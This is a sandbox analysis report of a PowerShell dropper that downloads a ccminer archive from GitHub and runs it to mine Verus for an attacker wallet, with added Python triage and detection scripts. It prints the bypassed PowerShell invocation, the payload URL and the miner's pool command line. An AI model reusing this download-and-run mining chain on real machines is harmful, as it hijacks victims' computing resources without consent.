Analysis

  • max time kernel
    315s
  • max time network
    1800s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64
    arch:x86
    image:win10-20240611-en
    locale:en-us
    os:windows10-1703-x64
    system
  • submitted
    20/07/2024, 14:44 UTC

General

  • Target

    windows.ps1

  • Size

    467B

  • MD5

    63f6c82077c4c39d6d9101409b16a668

  • SHA1

    09d1960993c90f39607f437a2106b65db7aeae29

  • SHA256

    18284686feab2a0753bd0059a64004d8b86bb47048065cba12d323efbb6cc891

  • SHA512

    3bbf47af04fae3e7fd921bf1319e652c879d6132d4ea495cb7d6f47a38b9a4fb09f7be4af14c2d0c7357febd893c16639268dc82ec3b9194d0d4dc54723e1a34

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe
      "C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe" -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Windows -p x -t 2
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        3⤵
          PID:4160
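
The process tree above is the whole story of this sample in three lines: powershell.exe started with -ExecutionPolicy bypass on a script in the user's Temp directory, a dropped ccminer.exe started from under Temp with a stratum pool URL and a wallet on its command line, and a cosmetic cmd.exe /c cls. The following triage script is an added example, not code from the report or from the sample; it reproduces the three events as constructed process-creation records (the parent pid of the root powershell.exe is assumed, since the report does not show it) and demonstrates what a detection engineer would extract from them: the execution-policy bypass on a Temp script, the executable launched from Temp, and the pool host, port, algorithm and wallet parsed out of the miner arguments. The option names it understands (-o/--url, -u/--user, -a/--algo, -t/--threads) are the common ccminer/xmrig conventions.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events mirroring the sandbox process tree
# (pid, parent pid, image path, command line). The ppid of the root
# powershell.exe is an assumption; the report does not show its parent.
EVENTS = [
    {"pid": 4472, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps1"},
    {"pid": 2612, "ppid": 4472,
     "image": r"C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe" -a verus '
                r"-o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Windows -p x -t 2"},
    {"pid": 4160, "ppid": 2612,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c cls"},
]

# URL schemes used by mining pools; anything else in -o/--url is not treated as a pool
POOL_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum+tls", "stratum2+tcp"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# -ExecutionPolicy and its accepted abbreviations, with a policy that disables script checks
EXEC_BYPASS = re.compile(r"-(?:ExecutionPolicy|exec|ex|ep)\s+(?:bypass|unrestricted)", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_args(cmdline):
    """Extract pool and wallet IOCs from ccminer/xmrig-style arguments; None if there are none."""
    toks = tokenize(cmdline)
    opts = {}
    i = 1  # toks[0] is the image path
    while i < len(toks):
        if toks[i].startswith("-") and i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            opts[toks[i].lstrip("-").lower()] = toks[i + 1]
            i += 2
        else:
            i += 1
    url = opts.get("o") or opts.get("url")
    if not url:
        return None
    parts = urlsplit(url)  # handles "stratum+tcp://host:port"; scheme is lower-cased
    if parts.scheme not in POOL_SCHEMES:
        return None
    # pool logins are conventionally <wallet>.<worker name>
    wallet, _, worker = (opts.get("u") or opts.get("user") or "").partition(".")
    return {"pool_host": parts.hostname, "pool_port": parts.port, "scheme": parts.scheme,
            "wallet": wallet, "worker": worker, "algo": opts.get("a") or opts.get("algo"),
            "threads": opts.get("t") or opts.get("threads")}


def triage(events):
    """Return one finding per (process, matched rule), with parent attribution where useful."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        if image.endswith("powershell.exe") and EXEC_BYPASS.search(e["cmdline"]) \
                and TEMP_DIR.search(e["cmdline"]):
            findings.append({"pid": e["pid"], "rule": "powershell_bypass_script_in_temp"})
        if TEMP_DIR.search(e["image"]):
            findings.append({"pid": e["pid"], "rule": "executable_run_from_temp",
                             "parent_image": parent["image"] if parent else None})
        miner = parse_miner_args(e["cmdline"])
        if miner:
            findings.append({"pid": e["pid"], "rule": "miner_pool_arguments", **miner})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Running it yields three findings: the bypass on pid 4472, the Temp-resident executable on pid 2612 with powershell.exe as its parent, and the pool record de.vipor.net:5040 / verus / wallet RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD, worker Windows. The wallet and pool are the durable IOCs here; the dropper script and the miner binary can be rebuilt at will.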

    Network

    • flag-us
      DNS
      raw.githubusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      raw.githubusercontent.com
      IN A
      Response
      raw.githubusercontent.com
      IN A
      185.199.110.133
      raw.githubusercontent.com
      IN A
      185.199.111.133
      raw.githubusercontent.com
      IN A
      185.199.108.133
      raw.githubusercontent.com
      IN A
      185.199.109.133
    • flag-us
      GET
      https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /MomboteQ/mining-scripts/main/verus/ccminer-win.zip HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
      Host: raw.githubusercontent.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 1412223
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: application/zip
      ETag: "19ccc6d11b3c33e877316ccc6d2b2e4b2ed7138fc831e088812c7f6a799d516d"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 871F:2D46DF:617E28:79271D:669BE38E
      Accept-Ranges: bytes
      Date: Sat, 20 Jul 2024 16:21:02 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600075-LCY
      X-Cache: HIT
      X-Cache-Hits: 2
      X-Timer: S1721492463.835553,VS0,VE0
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 53e1f9ef934c70a360b7c77bf1ad133886f91c10
      Expires: Sat, 20 Jul 2024 16:26:02 GMT
      Source-Age: 95
    • flag-us
      DNS
      133.110.199.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.110.199.185.in-addr.arpa
      IN PTR
      Response
      133.110.199.185.in-addr.arpa
      IN PTR
      cdn-185-199-110-133.github.com
    • flag-us
      DNS
      de.vipor.net
      ccminer.exe
      Remote address:
      8.8.8.8:53
      Request
      de.vipor.net
      IN A
      Response
      de.vipor.net
      IN CNAME
      de.vipordns.net
      de.vipordns.net
      IN A
      51.195.34.205
    • flag-us
      DNS
      205.34.195.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.34.195.51.in-addr.arpa
      IN PTR
      Response
      205.34.195.51.in-addr.arpa
      IN PTR
      ip205.ip-51-195-34.eu
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      31.73.42.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      31.73.42.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      240.143.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.143.123.92.in-addr.arpa
      IN PTR
      Response
      240.143.123.92.in-addr.arpa
      IN PTR
      a92-123-143-240.deploy.static.akamaitechnologies.com
    • 199.232.210.172:80
      322 B
      7
    • 199.232.210.172:80
      322 B
      7
    • 185.199.110.133:443
      https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
      tls, http
      powershell.exe
      26.9kB
      1.5MB
      567
      1062

      HTTP Request

      GET https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip

      HTTP Response

      200
    • 51.195.34.205:5040
      de.vipor.net
      ccminer.exe
      253.0kB
      58.6kB
      412
      252
    • 8.8.8.8:53
      raw.githubusercontent.com
      dns
      powershell.exe
      71 B
      135 B
      1
      1

      DNS Request

      raw.githubusercontent.com

      DNS Response

      185.199.110.133
      185.199.111.133
      185.199.108.133
      185.199.109.133

    • 8.8.8.8:53
      133.110.199.185.in-addr.arpa
      dns
      74 B
      118 B
      1
      1

      DNS Request

      133.110.199.185.in-addr.arpa

    • 8.8.8.8:53
      de.vipor.net
      dns
      ccminer.exe
      58 B
      100 B
      1
      1

      DNS Request

      de.vipor.net

      DNS Response

      51.195.34.205

    • 8.8.8.8:53
      205.34.195.51.in-addr.arpa
      dns
      72 B
      107 B
      1
      1

      DNS Request

      205.34.195.51.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    • 8.8.8.8:53
      31.73.42.20.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      31.73.42.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      240.143.123.92.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      240.143.123.92.in-addr.arpa
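
Two things in the network section are worth turning into detection logic. First, the download: the User-Agent "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0" is the default string Windows PowerShell 5.1's Invoke-WebRequest sends, so a PowerShell process pulling application/zip from raw.githubusercontent.com is a script fetching a payload from a code-hosting CDN, which is what the "Legitimate hosting services abused" signature is pointing at. Second, the miner session: ccminer.exe talks to 51.195.34.205:5040, a non-web port, and sends far more than it receives (253.0kB out, 58.6kB in), which is typical of share submission. The script below is an added example, not part of the report; it rebuilds the relevant DNS answers, the HTTP request and the flow byte counts as constructed records copied from the page (the process owning the two port-80 flows is not shown, so it is left unattributed), and applies both heuristics, tying the flow's destination IP back to the name that was resolved so the finding names de.vipor.net rather than a bare address.

```python
import re
from ipaddress import ip_address

# Constructed records mirroring the Network section above. Values are copied
# from the report; the process behind the port-80 flows is unknown there.
DNS_ANSWERS = {
    "raw.githubusercontent.com": ["185.199.110.133", "185.199.111.133",
                                  "185.199.108.133", "185.199.109.133"],
    "de.vipor.net": ["51.195.34.205"],
}
HTTP_REQUESTS = [
    {"process": "powershell.exe", "method": "GET",
     "url": "https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip",
     "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0",
     "resp_content_type": "application/zip"},
]
FLOWS = [
    {"dst": "185.199.110.133", "dport": 443, "process": "powershell.exe", "sent": 26_900, "recv": 1_500_000},
    {"dst": "51.195.34.205", "dport": 5040, "process": "ccminer.exe", "sent": 253_000, "recv": 58_600},
    {"dst": "199.232.210.172", "dport": 80, "process": None, "sent": 322, "recv": 0},
]

# Raw-file endpoints of code-hosting services that are routinely used as payload CDNs
RAW_HOSTING = {"raw.githubusercontent.com", "gist.githubusercontent.com",
               "objects.githubusercontent.com"}
PAYLOAD_TYPES = {"application/zip", "application/x-msdownload", "application/octet-stream"}
# Default User-Agents of script hosts and CLI fetchers rather than browsers
SCRIPT_HOST_UA = re.compile(r"WindowsPowerShell/\d|PowerShell/\d|curl/|Wget/", re.IGNORECASE)
WEB_PORTS = {80, 443, 8080, 8443}


def reverse_dns(answers):
    """Invert the answer map so a flow's destination IP maps to the name that was queried."""
    return {ip: name for name, ips in answers.items() for ip in ips}


def flag_http(requests):
    """Script host pulling an archive/executable from a code-hosting raw endpoint."""
    findings = []
    for r in requests:
        host = re.match(r"https?://([^/]+)", r["url"]).group(1).lower()
        if (host in RAW_HOSTING and SCRIPT_HOST_UA.search(r["user_agent"])
                and r["resp_content_type"] in PAYLOAD_TYPES):
            findings.append({"rule": "script_host_fetches_payload_from_code_hosting",
                             "process": r["process"], "url": r["url"]})
    return findings


def flag_flows(flows, answers):
    """Attributed, upload-dominant session to a public host on a non-web port (miner-like)."""
    names = reverse_dns(answers)
    findings = []
    for f in flows:
        ip = ip_address(f["dst"])
        if ip.is_private or ip.is_loopback or not f["process"]:
            continue
        if f["dport"] not in WEB_PORTS and f["recv"] > 0 and f["sent"] > f["recv"]:
            findings.append({"rule": "upload_heavy_session_on_nonweb_port",
                             "process": f["process"], "dst": f["dst"], "dport": f["dport"],
                             "dst_name": names.get(f["dst"])})
    return findings


if __name__ == "__main__":
    for finding in flag_http(HTTP_REQUESTS) + flag_flows(FLOWS, DNS_ANSWERS):
        print(finding)
```

The byte-ratio rule is a heuristic, not a signature: it is stated here as "more bytes out than in on a non-web port from a named process" and will also fire on legitimate uploaders, so it is a prioritisation aid to pair with the command-line evidence, not a standalone verdict. The reverse-DNS join matters for the same reason: pool operators rotate addresses, and de.vipor.net is the IOC that survives that.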

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsfoannb.gth.ps1

      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe

      Filesize

      652KB

      MD5

      153e4364a395b282b983dfc2c5884105

      SHA1

      9147a6afa63bd7d7e451c693e362730c692781e1

      SHA256

      6a1077166de9d1cc6fceaf6da6f8c5e1c8d9d5f99f3ab845b9790fc6d395d896

      SHA512

      378fe8b9ae243d5844243999a909ab45216920d63149b39be521e5212533f0dc30e8620c6285738e1100618f44d1576b3ccd9aa27b0e65b29a3ca1937047173d

    • memory/4472-175-0x000001DD3D8F0000-0x000001DD3D91A000-memory.dmp

      Filesize

      168KB

    • memory/4472-10-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

    • memory/4472-9-0x000001DD3D940000-0x000001DD3D9B6000-memory.dmp

      Filesize

      472KB

    • memory/4472-8-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

    • memory/4472-2-0x00007FF8EE9D3000-0x00007FF8EE9D4000-memory.dmp

      Filesize

      4KB

    • memory/4472-194-0x000001DD3D8F0000-0x000001DD3D912000-memory.dmp

      Filesize

      136KB

    • memory/4472-207-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

    • memory/4472-230-0x000001DD3D920000-0x000001DD3D932000-memory.dmp

      Filesize

      72KB

    • memory/4472-243-0x000001DD3D910000-0x000001DD3D91A000-memory.dmp

      Filesize

      40KB

    • memory/4472-5-0x000001DD3D790000-0x000001DD3D7B2000-memory.dmp

      Filesize

      136KB

    • memory/4472-258-0x00007FF8EE9D3000-0x00007FF8EE9D4000-memory.dmp

      Filesize

      4KB

    • memory/4472-259-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

    • memory/4472-260-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB
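
One entry in the Downloads list above is not a malware artifact at all. __PSScriptPolicyTest_wsfoannb.gth.ps1 is the one-byte file Windows PowerShell writes to the Temp directory at startup to test whether AppLocker/WDAC script enforcement applies to it; its content is the single character "1", and the four digests listed for it are exactly the digests of b"1". Sandboxes report it because it is a file PowerShell created, but it is created by every PowerShell session, so it belongs on an exclusion list rather than a blocklist. The script below is an added example, not part of the report; it carries the two Downloads entries as constructed records copied from the page, recomputes the probe digests to classify the policy-test file as a benign PowerShell artifact, and treats the probe name with any other content as suspicious, since nothing stops an attacker from reusing a name analysts habitually ignore. A third, constructed entry exercises that case.

```python
import hashlib
import re

# Constructed entries copied from the Downloads section (path, reported size, digests).
DROPPED = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsfoannb.gth.ps1",
     "size": "1B",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe",
     "size": "652KB",
     "md5": "153e4364a395b282b983dfc2c5884105",
     "sha1": "9147a6afa63bd7d7e451c693e362730c692781e1",
     "sha256": "6a1077166de9d1cc6fceaf6da6f8c5e1c8d9d5f99f3ab845b9790fc6d395d896"},
]

# Constructed, not from the report: the probe file name carrying a different
# payload, the case an exclusion rule must not silently wave through.
NAME_REUSE_EXAMPLE = {
    "path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_abcd1234.xyz.ps1",
    "size": "467B",
    "sha256": "0000000000000000000000000000000000000000000000000000000000000000",
}

# PowerShell writes __PSScriptPolicyTest_<random>.ps1 containing the single byte "1"
# to test AppLocker/WDAC script enforcement, so the probe's digests are fixed.
PROBE_NAME = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)
PROBE_CONTENT = b"1"
PROBE_DIGESTS = {algo: hashlib.new(algo, PROBE_CONTENT).hexdigest()
                 for algo in ("md5", "sha1", "sha256", "sha512")}


def classify(entry):
    """Label a dropped file as benign PowerShell probe, probe-name reuse, or payload."""
    present = [a for a in PROBE_DIGESTS if a in entry]
    digests_match = bool(present) and all(entry[a].lower() == PROBE_DIGESTS[a] for a in present)
    if PROBE_NAME.search(entry["path"]):
        if digests_match:
            return {"path": entry["path"], "verdict": "powershell_policy_probe", "ioc": False}
        # right name, wrong content (or no digest to check): do not exclude it
        return {"path": entry["path"], "verdict": "probe_name_with_unexpected_content", "ioc": True}
    return {"path": entry["path"], "verdict": "dropped_payload", "ioc": True}


def blocklist(entries, algo="sha256"):
    """Digests worth blocking: everything except verified PowerShell probe files."""
    return [e[algo] for e in entries if algo in e and classify(e)["ioc"]]


if __name__ == "__main__":
    for e in DROPPED + [NAME_REUSE_EXAMPLE]:
        print(classify(e))
    print(blocklist(DROPPED))
```

The same recomputation is a cheap sanity check on any sandbox "dropped file" list: a known-benign artifact is only excluded when both its name and its content match what the legitimate producer writes, never on the name alone.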
